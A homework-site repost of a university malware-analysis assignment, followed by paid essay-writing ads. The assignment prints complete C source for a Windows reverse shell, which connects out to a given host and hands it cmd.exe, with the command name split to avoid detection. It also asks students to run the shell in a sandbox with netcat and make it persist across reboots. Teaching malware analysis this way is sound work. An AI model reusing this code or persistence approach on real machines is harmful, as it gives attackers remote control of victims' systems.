Chat with us, powered by LiveChat SimpleReverseShell.7zCAP 4145 Introduction to Malware Analys - Aqhomework

SimpleReverseShell.7zCAP 4145 Introduction to Malware Analys

SimpleReverseShell.7zCAP 4145 Introduction to Malware Analysis Assignment 6 – Analyze Malicious Windows Programs 19 points Instructions: Note: Blue text points to a web link. Ctrl + Click to follow link.This is a team assignment. However, every student MUST submit the term project report even if all members of a group submit the same report.Answers to all questions must be put into ONE document. That is, every time, each student can only submit one report document, answering all questions of this assignment, if not explicitly stated otherwise. Students must put answers following each question in this assignment. The instructor will not grade a report with only answers in it and the student gets zero for such an assignment. An assignment report must include original questions.Students MUST submit the finished assignment in either Microsoft Word or pdf format to Webcourse. The doc must be submitted as ONE standalone file and cannot be tarred or zipped into a container.All required files or docs must be submitted in one submission (last submission). Note: Blackboard allows unlimited number of submission of one assignment by students.Refer to Print screen on how to take a screenshot. Pressing the Alt key in combination with PrtSc will capture the currently selected window. Problems: Answer each question following the original question. Do NOT delete the original question. The students are provided SimpleReverseShell.7z, which contains source code of a reverse shell. Requirements: The code shell.c in SimpleReverseShell.7z is given below. The students can refer to readme.txt in SimpleReverseShell.7z and search Google for specific APIs. Answer the questions following the code below. Please read compile.sh and revise it for the programming environment chosen by the students. Hint: The programming environment is similar to the one in Assignment 5.Paste the revised compile.sh following this question. (2 points)Run compile.sh and provide a screenshot that shows the compiled program.(1 point)Please read readme.txt and understand how to run the program. That is, the students should first start a nc (netcat) command as a server that accepts incoming connections at the sandbox VM LINUX01. On the sandbox VM WINHOST01, the students start the malware. Please write down the commands the students run on LINUX01 and WINHOST01 following this questions. (2 points)Please provide a screenshot that shows the result of running the malware. (1 point)Please select an approach so that the malware can start when WINHOST01 reboots. Please explain the chosen approach. (2 points)Please post related commands or screenshots following this question to show the chosen approach works. (2 points) // shell.c #include #include #pragma comment(lib, ‘w2_32’) WSADATA wsaData; SOCKET Winsock; SOCKET Sock; struct sockaddr_in hax; char aip_addr[16]; STARTUPINFO ini_processo; PROCESS_INFORMATION processo_info; int main(int argc, char *argv[]) { WSAStartup(MAKEWORD(2,2), &wsaData); Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL); if (argv[1] == NULL){ exit(1); } struct hostent *host; host = gethostbyname(argv[1]); strcpy(aip_addr, inet_ntoa(*((struct in_addr *)host->h_addr))); hax.sin_family = AF_INET; hax.sin_port = htons(atoi(argv[2])); hax.sin_addr.s_addr =inet_addr(aip_addr); WSAConnect(Winsock,(SOCKADDR*)&hax, sizeof(hax),NULL,NULL,NULL,NULL); if (WSAGetLastError() == 0) { memset(&ini_processo, 0, sizeof(ini_processo)); ini_processo.cb=sizeof(ini_processo); ini_processo.dwFlags=STARTF_USESTDHANDLES; ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock; char *myArray[4] = { ‘cm’, ‘d.e’, ‘x’, ‘e’ }; char command[8] = ”; snprintf( command, sizeof(command), ‘%s%s%s%s’, myArray[0], myArray[1], myArray[2], myArray[3]); CreateProcess(NULL, command, NULL, NULL, TRUE, 0, NULL, NULL, &ini_processo, &processo_info); exit(0); } else { exit(0); } } Please give a comment to each instruction above, and explain what each instruction does. (8 points)Please explain what this program does. (1 point)

Our website has a team of professional writers who can help you write any of your homework. They will write your papers from scratch. We also have a team of editors just to make sure all papers are of HIGH QUALITY & PLAGIARISM FREE. To make an Order you only need to click Ask A Question and we will direct you to our Order Page at WriteDemy. Then fill Our Order Form with all your assignment instructions. Select your deadline and pay for your paper. You will get it few hours before your set deadline.

Fill in all the assignment paper details that are required in the order form with the standard information being the page count, deadline, academic level and type of paper. It is advisable to have this information at hand so that you can quickly fill in the necessary information needed in the form for the essay writer to be immediately assigned to your writing project. Make payment for the custom essay order to enable us to assign a suitable writer to your order. Payments are made through Paypal on a secured billing page. Finally, sit back and relax.

Do you need an answer to this or any other questions?

Do you need help with this question?

Get assignment help from Aqhomework.com Paper Writing Website and forget about your problems.

Aqhomework provides custom & cheap essay writing 100% original, plagiarism free essays, assignments & dissertations.

With an exceptional team of professional academic experts in a wide range of subjects, we can guarantee you an unrivaled quality of custom-written papers.

Click Order now to access our order form, fill your paper details correctly, select your paper deadline and wait for our writers to send a perfectly written assignment. 

Chat with us today! We are always waiting to answer all your questions.